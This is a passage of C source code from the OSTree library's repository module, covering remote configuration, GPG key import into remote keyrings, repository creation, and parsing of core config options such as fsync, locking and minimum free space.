(remote == NULL) { if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } g_clear_error (&local_error); if (!impl_repo_remote_add (self, sysroot, FALSE, name, url, options, cancellable, error)) return FALSE; } else { /* Replace the entire option group */ if (!g_key_file_remove_group (remote->options, remote->group, error)) return FALSE; if (g_str_has_prefix (url, "metalink=")) g_key_file_set_string (remote->options, remote->group, "metalink", url + strlen ("metalink=")); else g_key_file_set_string (remote->options, remote->group, "url", url); if (options != NULL) keyfile_set_from_vardict (remote->options, remote->group, options); /* Write out updated settings */ if (remote->file != NULL) { gsize length; g_autofree char *data = g_key_file_to_data (remote->options, &length, NULL); if (!g_file_replace_contents (remote->file, data, length, NULL, FALSE, 0, NULL, cancellable, error)) return FALSE; } else { g_autoptr(GKeyFile) config = ostree_repo_copy_config (self); /* Remove the existing group if it exists */ if (!g_key_file_remove_group (config, remote->group, &local_error)) { if (!g_error_matches (local_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_GROUP_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } ot_keyfile_copy_group (remote->options, config, remote->group); if (!ostree_repo_write_config (self, config, error)) return FALSE; } } return TRUE; } /** * ostree_repo_remote_change: * @self: Repo * @sysroot: (allow-none): System root * @changeop: Operation to perform * @name: Name of remote * @url: URL for remote (if URL begins with metalink=, it will be used as such) * @options: (allow-none): GVariant of type a{sv} * @cancellable: Cancellable * @error: Error * * A combined function handling the equivalent of * ostree_repo_remote_add(), ostree_repo_remote_delete(), with more * options. * * */ gboolean ostree_repo_remote_change (OstreeRepo *self, GFile *sysroot, OstreeRepoRemoteChange changeop, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { switch (changeop) { case OSTREE_REPO_REMOTE_CHANGE_ADD: return impl_repo_remote_add (self, sysroot, FALSE, name, url, options, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_ADD_IF_NOT_EXISTS: return impl_repo_remote_add (self, sysroot, TRUE, name, url, options, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_DELETE: return impl_repo_remote_delete (self, sysroot, FALSE, name, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_DELETE_IF_EXISTS: return impl_repo_remote_delete (self, sysroot, TRUE, name, cancellable, error); case OSTREE_REPO_REMOTE_CHANGE_REPLACE: return impl_repo_remote_replace (self, sysroot, name, url, options, cancellable, error); } g_assert_not_reached (); } static void _ostree_repo_remote_list (OstreeRepo *self, GHashTable *out) { GHashTableIter iter; gpointer key, value; g_mutex_lock (&self->remotes_lock); g_hash_table_iter_init (&iter, self->remotes); while (g_hash_table_iter_next (&iter, &key, &value)) g_hash_table_insert (out, g_strdup (key), NULL); g_mutex_unlock (&self->remotes_lock); if (self->parent_repo) _ostree_repo_remote_list (self->parent_repo, out); } /** * ostree_repo_remote_list: * @self: Repo * @out_n_remotes: (out) (allow-none): Number of remotes available * * List available remote names in an #OstreeRepo. Remote names are sorted * alphabetically. If no remotes are available the function returns %NULL. * * Returns: (array length=out_n_remotes) (transfer full): a %NULL-terminated * array of remote names **/ char ** ostree_repo_remote_list (OstreeRepo *self, guint *out_n_remotes) { char **remotes = NULL; guint n_remotes; g_autoptr(GHashTable) remotes_ht = NULL; remotes_ht = g_hash_table_new_full (g_str_hash, g_str_equal, (GDestroyNotify) g_free, (GDestroyNotify) NULL); _ostree_repo_remote_list (self, remotes_ht); n_remotes = g_hash_table_size (remotes_ht); if (n_remotes > 0) { GList *list, *link; guint ii = 0; remotes = g_new (char *, n_remotes + 1); list = g_hash_table_get_keys (remotes_ht); list = g_list_sort (list, (GCompareFunc) strcmp); for (link = list; link != NULL; link = link->next) remotes[ii++] = g_strdup (link->data); g_list_free (list); remotes[ii] = NULL; } if (out_n_remotes) *out_n_remotes = n_remotes; return remotes; } /** * ostree_repo_remote_get_url: * @self: Repo * @name: Name of remote * @out_url: (out) (allow-none): Remote's URL * @error: Error * * Return the URL of the remote named @name through @out_url. It is an * error if the provided remote does not exist. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_url (OstreeRepo *self, const char *name, char **out_url, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_autofree char *url = NULL; if (_ostree_repo_remote_name_is_file (name)) { url = g_strdup (name); } else { if (!ostree_repo_get_remote_option (self, name, "url", NULL, &url, error)) return FALSE; if (url == NULL) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "No \"url\" option in remote \"%s\"", name); return FALSE; } } if (out_url != NULL) *out_url = g_steal_pointer (&url); return TRUE; } /** * ostree_repo_remote_get_gpg_verify: * @self: Repo * @name: Name of remote * @out_gpg_verify: (out) (allow-none): Remote's GPG option * @error: Error * * Return whether GPG verification is enabled for the remote named @name * through @out_gpg_verify. It is an error if the provided remote does * not exist. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_gpg_verify (OstreeRepo *self, const char *name, gboolean *out_gpg_verify, GError **error) { g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (name != NULL, FALSE); /* For compatibility with pull-local, don't GPG verify file:// URIs. */ if (_ostree_repo_remote_name_is_file (name)) { if (out_gpg_verify != NULL) *out_gpg_verify = FALSE; return TRUE; } return ostree_repo_get_remote_boolean_option (self, name, "gpg-verify", TRUE, out_gpg_verify, error); } /** * ostree_repo_remote_get_gpg_verify_summary: * @self: Repo * @name: Name of remote * @out_gpg_verify_summary: (out) (allow-none): Remote's GPG option * @error: Error * * Return whether GPG verification of the summary is enabled for the remote * named @name through @out_gpg_verify_summary. It is an error if the provided * remote does not exist. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_get_gpg_verify_summary (OstreeRepo *self, const char *name, gboolean *out_gpg_verify_summary, GError **error) { return ostree_repo_get_remote_boolean_option (self, name, "gpg-verify-summary", FALSE, out_gpg_verify_summary, error); } /** * ostree_repo_remote_gpg_import: * @self: Self * @name: name of a remote * @source_stream: (nullable): a #GInputStream, or %NULL * @key_ids: (array zero-terminated=1) (element-type utf8) (nullable): a %NULL-terminated array of GPG key IDs, or %NULL * @out_imported: (out) (optional): return location for the number of imported * keys, or %NULL * @cancellable: a #GCancellable * @error: a #GError * * Imports one or more GPG keys from the open @source_stream, or from the * user's personal keyring if @source_stream is %NULL. The @key_ids array * can optionally restrict which keys are imported. If @key_ids is %NULL, * then all keys are imported. * * The imported keys will be used to conduct GPG verification when pulling * from the remote named @name. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_gpg_import (OstreeRepo *self, const char *name, GInputStream *source_stream, const char * const *key_ids, guint *out_imported, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME OstreeRemote *remote; g_auto(gpgme_ctx_t) source_context = NULL; g_auto(gpgme_ctx_t) target_context = NULL; g_auto(gpgme_data_t) data_buffer = NULL; gpgme_import_result_t import_result; gpgme_import_status_t import_status; g_autofree char *source_tmp_dir = NULL; g_autofree char *target_tmp_dir = NULL; glnx_autofd int target_temp_fd = -1; g_autoptr(GPtrArray) keys = NULL; struct stat stbuf; gpgme_error_t gpg_error; gboolean ret = FALSE; g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (name != NULL, FALSE); /* First make sure the remote name is valid. */ remote = _ostree_repo_get_remote_inherited (self, name, error); if (remote == NULL) goto out; /* Prepare the source GPGME context. If reading GPG keys from an input * stream, point the OpenPGP engine at a temporary directory and import * the keys to a new pubring.gpg file. If the key data format is ASCII * armored, this step will convert them to binary. */ source_context = ot_gpgme_new_ctx (NULL, error); if (!source_context) goto out; if (source_stream != NULL) { data_buffer = ot_gpgme_data_input (source_stream); if (!ot_gpgme_ctx_tmp_home_dir (source_context, &source_tmp_dir, NULL, cancellable, error)) { g_prefix_error (error, "Unable to configure context: "); goto out; } gpg_error = gpgme_op_import (source_context, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import keys"); goto out; } g_clear_pointer (&data_buffer, (GDestroyNotify) gpgme_data_release); } /* Retrieve all keys or specific keys from the source GPGME context. * Assemble a NULL-terminated array of gpgme_key_t structs to import. */ /* The keys array will contain a NULL terminator, but it turns out, * although not documented, gpgme_key_unref() gracefully handles it. */ keys = g_ptr_array_new_with_free_func ((GDestroyNotify) gpgme_key_unref); if (key_ids != NULL) { guint ii; for (ii = 0; key_ids[ii] != NULL; ii++) { gpgme_key_t key = NULL; gpg_error = gpgme_get_key (source_context, key_ids[ii], &key, 0); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to find key \"%s\"", key_ids[ii]); goto out; } /* Transfer ownership. */ g_ptr_array_add (keys, key); } } else { gpg_error = gpgme_op_keylist_start (source_context, NULL, 0); while (gpg_error == GPG_ERR_NO_ERROR) { gpgme_key_t key = NULL; gpg_error = gpgme_op_keylist_next (source_context, &key); if (gpg_error != GPG_ERR_NO_ERROR) break; /* Transfer ownership. */ g_ptr_array_add (keys, key); } if (gpgme_err_code (gpg_error) != GPG_ERR_EOF) { ot_gpgme_throw (gpg_error, error, "Unable to list keys"); goto out; } } /* Add the NULL terminator. */ g_ptr_array_add (keys, NULL); /* Prepare the target GPGME context to serve as the import destination. * Here the pubring.gpg file in a second temporary directory is a copy * of the remote's keyring file. We'll let the import operation alter * the pubring.gpg file, then rename it back to its permanent home. */ target_context = ot_gpgme_new_ctx (NULL, error); if (!target_context) goto out; /* No need for an output stream since we copy in a pubring.gpg. */ if (!ot_gpgme_ctx_tmp_home_dir (target_context, &target_tmp_dir, NULL, cancellable, error)) { g_prefix_error (error, "Unable to configure context: "); goto out; } if (!glnx_opendirat (AT_FDCWD, target_tmp_dir, FALSE, &target_temp_fd, error)) { g_prefix_error (error, "Unable to open directory: "); goto out; } if (fstatat (self->repo_dir_fd, remote->keyring, &stbuf, AT_SYMLINK_NOFOLLOW) == 0) { if (!glnx_file_copy_at (self->repo_dir_fd, remote->keyring, &stbuf, target_temp_fd, "pubring.gpg", GLNX_FILE_COPY_NOXATTRS, cancellable, error)) { g_prefix_error (error, "Unable to copy remote's keyring: "); goto out; } } else if (errno == ENOENT) { glnx_autofd int fd = -1; /* Create an empty pubring.gpg file prior to importing keys. This * prevents gpg2 from creating a pubring.kbx file in the new keybox * format [1]. We want to stay with the older keyring format since * its performance issues are not relevant here. * * [1] https://gnupg.org/faq/whats-new-in-2.1.html#keybox */ fd = openat (target_temp_fd, "pubring.gpg", O_WRONLY | O_CREAT | O_CLOEXEC | O_NOCTTY, 0644); if (fd == -1) { glnx_set_prefix_error_from_errno (error, "%s", "Unable to create pubring.gpg"); goto out; } } else { glnx_set_prefix_error_from_errno (error, "%s", "Unable to copy remote's keyring"); goto out; } /* Export the selected keys from the source context and import them into * the target context. */ gpg_error = gpgme_data_new (&data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to create data buffer"); goto out; } gpg_error = gpgme_op_export_keys (source_context, (gpgme_key_t *) keys->pdata, 0, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to export keys"); goto out; } (void) gpgme_data_seek (data_buffer, 0, SEEK_SET); gpg_error = gpgme_op_import (target_context, data_buffer); if (gpg_error != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import keys"); goto out; } import_result = gpgme_op_import_result (target_context); g_return_val_if_fail (import_result != NULL, FALSE); /* Check the status of each import and fail on the first error. * All imports must be successful to update the remote's keyring. */ for (import_status = import_result->imports; import_status != NULL; import_status = import_status->next) { if (import_status->result != GPG_ERR_NO_ERROR) { ot_gpgme_throw (gpg_error, error, "Unable to import key \"%s\"", import_status->fpr); goto out; } } /* Import successful; replace the remote's old keyring with the * updated keyring in the target context's temporary directory. */ if (!glnx_file_copy_at (target_temp_fd, "pubring.gpg", NULL, self->repo_dir_fd, remote->keyring, GLNX_FILE_COPY_NOXATTRS | GLNX_FILE_COPY_OVERWRITE, cancellable, error)) goto out; if (out_imported != NULL) *out_imported = (guint) import_result->imported; ret = TRUE; out: if (remote != NULL) ostree_remote_unref (remote); if (source_tmp_dir != NULL) { ot_gpgme_kill_agent (source_tmp_dir); (void) glnx_shutil_rm_rf_at (AT_FDCWD, source_tmp_dir, NULL, NULL); } if (target_tmp_dir != NULL) { ot_gpgme_kill_agent (target_tmp_dir); (void) glnx_shutil_rm_rf_at (AT_FDCWD, target_tmp_dir, NULL, NULL); } g_prefix_error (error, "GPG: "); return ret; #else /* OSTREE_DISABLE_GPGME */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_remote_fetch_summary: * @self: Self * @name: name of a remote * @out_summary: (out) (optional): return location for raw summary data, or * %NULL * @out_signatures: (out) (optional): return location for raw summary * signature data, or %NULL * @cancellable: a #GCancellable * @error: a #GError * * Tries to fetch the summary file and any GPG signatures on the summary file * over HTTP, and returns the binary data in @out_summary and @out_signatures * respectively. * * If no summary file exists on the remote server, @out_summary is set to * @NULL. Likewise if the summary file is not signed, @out_signatures is * set to @NULL. In either case the function still returns %TRUE. * * This method does not verify the signature of the downloaded summary file. * Use ostree_repo_verify_summary() for that. * * Parse the summary data into a #GVariant using g_variant_new_from_bytes() * with #OSTREE_SUMMARY_GVARIANT_FORMAT as the format string. * * Returns: %TRUE on success, %FALSE on failure */ gboolean ostree_repo_remote_fetch_summary (OstreeRepo *self, const char *name, GBytes **out_summary, GBytes **out_signatures, GCancellable *cancellable, GError **error) { return ostree_repo_remote_fetch_summary_with_options (self, name, NULL, out_summary, out_signatures, cancellable, error); } static gboolean ostree_repo_mode_to_string (OstreeRepoMode mode, const char **out_mode, GError **error) { const char *ret_mode; switch (mode) { case OSTREE_REPO_MODE_BARE: ret_mode = "bare"; break; case OSTREE_REPO_MODE_BARE_USER: ret_mode = "bare-user"; break; case OSTREE_REPO_MODE_BARE_USER_ONLY: ret_mode = "bare-user-only"; break; case OSTREE_REPO_MODE_ARCHIVE: /* Legacy alias */ ret_mode ="archive-z2"; break; default: return glnx_throw (error, "Invalid mode '%d'", mode); } *out_mode = ret_mode; return TRUE; } /** * ostree_repo_mode_from_string: * @mode: a repo mode as a string * @out_mode: (out): the corresponding #OstreeRepoMode * @error: a #GError if the string is not a valid mode */ gboolean ostree_repo_mode_from_string (const char *mode, OstreeRepoMode *out_mode, GError **error) { OstreeRepoMode ret_mode; if (strcmp (mode, "bare") == 0) ret_mode = OSTREE_REPO_MODE_BARE; else if (strcmp (mode, "bare-user") == 0) ret_mode = OSTREE_REPO_MODE_BARE_USER; else if (strcmp (mode, "bare-user-only") == 0) ret_mode = OSTREE_REPO_MODE_BARE_USER_ONLY; else if (strcmp (mode, "archive-z2") == 0 || strcmp (mode, "archive") == 0) ret_mode = OSTREE_REPO_MODE_ARCHIVE; else return glnx_throw (error, "Invalid mode '%s' in repository configuration", mode); *out_mode = ret_mode; return TRUE; } #define DEFAULT_CONFIG_CONTENTS ("[core]\n" \ "repo_version=1\n") /* Just write the dirs to disk, return a dfd */ static gboolean repo_create_at_internal (int dfd, const char *path, OstreeRepoMode mode, GVariant *options, int *out_dfd, GCancellable *cancellable, GError **error) { GLNX_AUTO_PREFIX_ERROR ("Creating repo", error); struct stat stbuf; /* We do objects/ last - if it exists we do nothing and exit successfully */ const char *state_dirs[] = { "tmp", "extensions", "state", "refs", "refs/heads", "refs/mirrors", "refs/remotes", "objects" }; /* Early return if we have an existing repo */ { g_autofree char *objects_path = g_build_filename (path, "objects", NULL); if (!glnx_fstatat_allow_noent (dfd, objects_path, &stbuf, 0, error)) return FALSE; if (errno == 0) { glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return FALSE; /* Note early return */ *out_dfd = glnx_steal_fd (&repo_dfd); return TRUE; } } if (mkdirat (dfd, path, DEFAULT_DIRECTORY_MODE) != 0) { if (G_UNLIKELY (errno != EEXIST)) return glnx_throw_errno_prefix (error, "mkdirat"); } glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return FALSE; if (!glnx_fstatat_allow_noent (repo_dfd, "config", &stbuf, 0, error)) return FALSE; if (errno == ENOENT) { const char *mode_str = NULL; g_autoptr(GString) config_data = g_string_new (DEFAULT_CONFIG_CONTENTS); if (!ostree_repo_mode_to_string (mode, &mode_str, error)) return FALSE; g_assert (mode_str); g_string_append_printf (config_data, "mode=%s\n", mode_str); const char *collection_id = NULL; if (options) g_variant_lookup (options, "collection-id", "&s", &collection_id); if (collection_id != NULL) g_string_append_printf (config_data, "collection-id=%s\n", collection_id); if (!glnx_file_replace_contents_at (repo_dfd, "config", (guint8*)config_data->str, config_data->len, 0, cancellable, error)) return FALSE; } for (guint i = 0; i < G_N_ELEMENTS (state_dirs); i++) { const char *elt = state_dirs[i]; if (mkdirat (repo_dfd, elt, DEFAULT_DIRECTORY_MODE) == -1) { if (G_UNLIKELY (errno != EEXIST)) return glnx_throw_errno_prefix (error, "mkdirat"); } } /* Test that the fs supports user xattrs now, so we get an error early rather * than during an object write later. */ if (mode == OSTREE_REPO_MODE_BARE_USER) { g_auto(GLnxTmpfile) tmpf = { 0, }; if (!glnx_open_tmpfile_linkable_at (repo_dfd, ".", O_RDWR|O_CLOEXEC, &tmpf, error)) return FALSE; if (!_ostree_write_bareuser_metadata (tmpf.fd, 0, 0, 644, NULL, error)) return FALSE; } *out_dfd = glnx_steal_fd (&repo_dfd); return TRUE; } /** * ostree_repo_create: * @self: An #OstreeRepo * @mode: The mode to store the repository in * @cancellable: Cancellable * @error: Error * * Create the underlying structure on disk for the repository, and call * ostree_repo_open() on the result, preparing it for use. * Since version 2016.8, this function will succeed on an existing * repository, and finish creating any necessary files in a partially * created repository. However, this function cannot change the mode * of an existing repository, and will silently ignore an attempt to * do so. * * Since 2017.9, "existing repository" is defined by the existence of an * `objects` subdirectory. * * This function predates ostree_repo_create_at(). It is an error to call * this function on a repository initialized via ostree_repo_open_at(). */ gboolean ostree_repo_create (OstreeRepo *self, OstreeRepoMode mode, GCancellable *cancellable, GError **error) { g_return_val_if_fail (self->repodir, FALSE); const char *repopath = gs_file_get_path_cached (self->repodir); g_autoptr(GVariantBuilder) builder = g_variant_builder_new (G_VARIANT_TYPE ("a{sv}")); if (self->collection_id) g_variant_builder_add (builder, "{s@v}", "collection-id", g_variant_new_variant (g_variant_new_string (self->collection_id))); glnx_autofd int repo_dir_fd = -1; g_autoptr(GVariant) options = g_variant_ref_sink (g_variant_builder_end (builder)); if (!repo_create_at_internal (AT_FDCWD, repopath, mode, options, &repo_dir_fd, cancellable, error)) return FALSE; self->repo_dir_fd = glnx_steal_fd (&repo_dir_fd); if (!ostree_repo_open (self, cancellable, error)) return FALSE; return TRUE; } /** * ostree_repo_create_at: * @dfd: Directory fd * @path: Path * @mode: The mode to store the repository in * @options: (nullable): a{sv}: See below for accepted keys * @cancellable: Cancellable * @error: Error * * This is a file-descriptor relative version of ostree_repo_create(). * Create the underlying structure on disk for the repository, and call * ostree_repo_open_at() on the result, preparing it for use. * * If a repository already exists at @dfd + @path (defined by an `objects/` * subdirectory existing), then this function will simply call * ostree_repo_open_at(). In other words, this function cannot be used to change * the mode or configuration (`repo/config`) of an existing repo. * * The @options dict may contain: * * - collection-id: s: Set as collection ID in repo/config (Since 2017.9) * * Returns: (transfer full): A new OSTree repository reference * * Since: 2017.10 */ OstreeRepo * ostree_repo_create_at (int dfd, const char *path, OstreeRepoMode mode, GVariant *options, GCancellable *cancellable, GError **error) { glnx_autofd int repo_dfd = -1; if (!repo_create_at_internal (dfd, path, mode, options, &repo_dfd, cancellable, error)) return NULL; return repo_open_at_take_fd (&repo_dfd, cancellable, error); } static gboolean enumerate_directory_allow_noent (GFile *dirpath, const char *queryargs, GFileQueryInfoFlags queryflags, GFileEnumerator **out_direnum, GCancellable *cancellable, GError **error) { g_autoptr(GError) temp_error = NULL; g_autoptr(GFileEnumerator) ret_direnum = NULL; ret_direnum = g_file_enumerate_children (dirpath, queryargs, queryflags, cancellable, &temp_error); if (!ret_direnum) { if (g_error_matches (temp_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) g_clear_error (&temp_error); else { g_propagate_error (error, g_steal_pointer (&temp_error)); return FALSE; } } if (out_direnum) *out_direnum = g_steal_pointer (&ret_direnum); return TRUE; } static gboolean add_remotes_from_keyfile (OstreeRepo *self, GKeyFile *keyfile, GFile *file, GError **error) { GQueue queue = G_QUEUE_INIT; g_auto(GStrv) groups = NULL; gsize length, ii; gboolean ret = FALSE; g_mutex_lock (&self->remotes_lock); groups = g_key_file_get_groups (keyfile, &length); for (ii = 0; ii < length; ii++) { OstreeRemote *remote; remote = ostree_remote_new_from_keyfile (keyfile, groups[ii]); if (remote != NULL) { /* Make sure all the remotes in the key file are * acceptable before adding any to the OstreeRepo. */ g_queue_push_tail (&queue, remote); if (g_hash_table_contains (self->remotes, remote->name)) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_FAILED, "Multiple specifications found for remote \"%s\"", remote->name); goto out; } if (file != NULL) remote->file = g_object_ref (file); } } while (!g_queue_is_empty (&queue)) { OstreeRemote *remote = g_queue_pop_head (&queue); g_hash_table_replace (self->remotes, remote->name, remote); } ret = TRUE; out: while (!g_queue_is_empty (&queue)) ostree_remote_unref (g_queue_pop_head (&queue)); g_mutex_unlock (&self->remotes_lock); return ret; } static gboolean append_one_remote_config (OstreeRepo *self, GFile *path, GCancellable *cancellable, GError **error) { g_autoptr(GKeyFile) remotedata = g_key_file_new (); if (!g_key_file_load_from_file (remotedata, gs_file_get_path_cached (path), 0, error)) return FALSE; return add_remotes_from_keyfile (self, remotedata, path, error); } static GFile * get_remotes_d_dir (OstreeRepo *self, GFile *sysroot) { g_autoptr(GFile) sysroot_owned = NULL; /* Very complicated sysroot logic; this bit breaks the otherwise mostly clean * layering between OstreeRepo and OstreeSysroot. First, If a sysroot was * provided, use it. Otherwise, check to see whether we reference * /ostree/repo, or if not that, see if we have a ref to a sysroot (and it's * physical). */ g_autoptr(OstreeSysroot) sysroot_ref = NULL; if (sysroot == NULL) { /* No explicit sysroot? Let's see if we have a kind */ switch (self->sysroot_kind) { case OSTREE_REPO_SYSROOT_KIND_UNKNOWN: g_assert_not_reached (); break; case OSTREE_REPO_SYSROOT_KIND_NO: break; case OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE: sysroot = sysroot_owned = g_file_new_for_path ("/"); break; case OSTREE_REPO_SYSROOT_KIND_VIA_SYSROOT: sysroot_ref = (OstreeSysroot*)g_weak_ref_get (&self->sysroot); /* Only write to /etc/ostree/remotes.d if we are pointed at a deployment */ if (sysroot_ref != NULL && !sysroot_ref->is_physical) sysroot = ostree_sysroot_get_path (sysroot_ref); break; } } /* For backwards compat, also fall back to the sysroot-path variable, which we * don't set anymore internally, and I hope no one else uses. */ if (sysroot == NULL && sysroot_ref == NULL) sysroot = self->sysroot_dir; /* Was the config directory specified? If so, use that with the * optional sysroot prepended. If not, return the path in /etc if the * sysroot was found and NULL otherwise to use the repo config. */ if (self->remotes_config_dir != NULL) { if (sysroot == NULL) return g_file_new_for_path (self->remotes_config_dir); else return g_file_resolve_relative_path (sysroot, self->remotes_config_dir); } else if (sysroot == NULL) return NULL; else return g_file_resolve_relative_path (sysroot, SYSCONF_REMOTES); } static gboolean min_free_space_calculate_reserved_bytes (OstreeRepo *self, guint64 *bytes, GError **error) { guint64 reserved_bytes = 0; struct statvfs stvfsbuf; if (TEMP_FAILURE_RETRY (fstatvfs (self->repo_dir_fd, &stvfsbuf)) < 0) return glnx_throw_errno_prefix (error, "fstatvfs"); if (self->min_free_space_mb > 0) { if (self->min_free_space_mb > (G_MAXUINT64 >> 20)) return glnx_throw (error, "min-free-space value is greater than the maximum allowed value of %" G_GUINT64_FORMAT " bytes", (G_MAXUINT64 >> 20)); reserved_bytes = self->min_free_space_mb << 20; } else if (self->min_free_space_percent > 0) { if (stvfsbuf.f_frsize > (G_MAXUINT64 / stvfsbuf.f_blocks)) return glnx_throw (error, "Filesystem's size is greater than the maximum allowed value of %" G_GUINT64_FORMAT " bytes", (G_MAXUINT64 / stvfsbuf.f_blocks)); guint64 total_bytes = (stvfsbuf.f_frsize * stvfsbuf.f_blocks); reserved_bytes = ((double)total_bytes) * (self->min_free_space_percent/100.0); } *bytes = reserved_bytes; return TRUE; } static gboolean min_free_space_size_validate_and_convert (OstreeRepo *self, const char *min_free_space_size_str, GError **error) { static GRegex *regex; static gsize regex_initialized; if (g_once_init_enter (&regex_initialized)) { regex = g_regex_new ("^([0-9]+)(G|M|T)B$", 0, 0, NULL); g_assert (regex); g_once_init_leave (&regex_initialized, 1); } g_autoptr(GMatchInfo) match = NULL; if (!g_regex_match (regex, min_free_space_size_str, 0, &match)) return glnx_throw (error, "It should be of the format '123MB', '123GB' or '123TB'"); g_autofree char *size_str = g_match_info_fetch (match, 1); g_autofree char *unit = g_match_info_fetch (match, 2); guint shifts; switch (*unit) { case 'M': shifts = 0; break; case 'G': shifts = 10; break; case 'T': shifts = 20; break; default: g_assert_not_reached (); } guint64 min_free_space = g_ascii_strtoull (size_str, NULL, 10); if (shifts > 0 && g_bit_nth_lsf (min_free_space, 63 - shifts) != -1) return glnx_throw (error, "Value was too high"); self->min_free_space_mb = min_free_space << shifts; return TRUE; } static gboolean reload_core_config (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_autofree char *version = NULL; g_autofree char *mode = NULL; g_autofree char *contents = NULL; g_autofree char *parent_repo_path = NULL; gboolean is_archive; gsize len; g_clear_pointer (&self->config, (GDestroyNotify)g_key_file_unref); self->config = g_key_file_new (); contents = glnx_file_get_contents_utf8_at (self->repo_dir_fd, "config", &len, NULL, error); if (!contents) return FALSE; if (!g_key_file_load_from_data (self->config, contents, len, 0, error)) { g_prefix_error (error, "Couldn't parse config file: "); return FALSE; } version = g_key_file_get_value (self->config, "core", "repo_version", error); if (!version) return FALSE; if (strcmp (version, "1") != 0) return glnx_throw (error, "Invalid repository version '%s'", version); if (!ot_keyfile_get_boolean_with_default (self->config, "core", "archive", FALSE, &is_archive, error)) return FALSE; if (is_archive) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_SUPPORTED, "This version of OSTree no longer supports \"archive\" repositories; use archive-z2 instead"); return FALSE; } if (!ot_keyfile_get_value_with_default (self->config, "core", "mode", "bare", &mode, error)) return FALSE; if (!ostree_repo_mode_from_string (mode, &self->mode, error)) return FALSE; if (self->writable) { if (!ot_keyfile_get_boolean_with_default (self->config, "core", "enable-uncompressed-cache", TRUE, &self->enable_uncompressed_cache, error)) return FALSE; } else self->enable_uncompressed_cache = FALSE; { gboolean do_fsync; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "fsync", TRUE, &do_fsync, error)) return FALSE; if (!do_fsync) ostree_repo_set_disable_fsync (self, TRUE); } if (!ot_keyfile_get_boolean_with_default (self->config, "core", "per-object-fsync", FALSE, &self->per_object_fsync, error)) return FALSE; /* See https://github.com/ostreedev/ostree/issues/758 */ if (!ot_keyfile_get_boolean_with_default (self->config, "core", "disable-xattrs", FALSE, &self->disable_xattrs, error)) return FALSE; { g_autofree char *tmp_expiry_seconds = NULL; /* 86400 secs = one day */ if (!ot_keyfile_get_value_with_default (self->config, "core", "tmp-expiry-secs", "86400", &tmp_expiry_seconds, error)) return FALSE; self->tmp_expiry_seconds = g_ascii_strtoull (tmp_expiry_seconds, NULL, 10); } { gboolean locking; /* Enabled by default in 2018.05 */ if (!ot_keyfile_get_boolean_with_default (self->config, "core", "locking", TRUE, &locking, error)) return FALSE; if (!locking) { self->lock_timeout_seconds = REPO_LOCK_DISABLED; } else { g_autofree char *lock_timeout_seconds = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "lock-timeout-secs", "30", &lock_timeout_seconds, error)) return FALSE; self->lock_timeout_seconds = g_ascii_strtoll (lock_timeout_seconds, NULL, 10); } } { g_autofree char *compression_level_str = NULL; /* gzip defaults to 6 */ (void)ot_keyfile_get_value_with_default (self->config, "archive", "zlib-level", NULL, &compression_level_str, NULL); if (compression_level_str) /* Ensure level is in [1,9] */ self->zlib_compression_level = MAX (1, MIN (9, g_ascii_strtoull (compression_level_str, NULL, 10))); else self->zlib_compression_level = OSTREE_ARCHIVE_DEFAULT_COMPRESSION_LEVEL; } { /* Try to parse both min-free-space-* config options first. If both are absent, fallback on 3% free space. * If both are present and are non-zero, use min-free-space-size unconditionally and display a warning. */ if (g_key_file_has_key (self->config, "core", "min-free-space-size", NULL)) { g_autofree char *min_free_space_size_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "min-free-space-size", NULL, &min_free_space_size_str, error)) return FALSE; /* Validate the string and convert the size to MBs */ if (!min_free_space_size_validate_and_convert (self, min_free_space_size_str, error)) return glnx_prefix_error (error, "Invalid min-free-space-size '%s'", min_free_space_size_str); } if (g_key_file_has_key (self->config, "core", "min-free-space-percent", NULL)) { g_autofree char *min_free_space_percent_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "min-free-space-percent", NULL, &min_free_space_percent_str, error)) return FALSE; self->min_free_space_percent = g_ascii_strtoull (min_free_space_percent_str, NULL, 10); if (self->min_free_space_percent > 99) return glnx_throw (error, "Invalid min-free-space-percent '%s'", min_free_space_percent_str); } else if (!g_key_file_has_key (self->config, "core", "min-free-space-size", NULL)) { /* Default fallback of 3% free space. If changing this, be sure to change the man page too */ self->min_free_space_percent = 3; 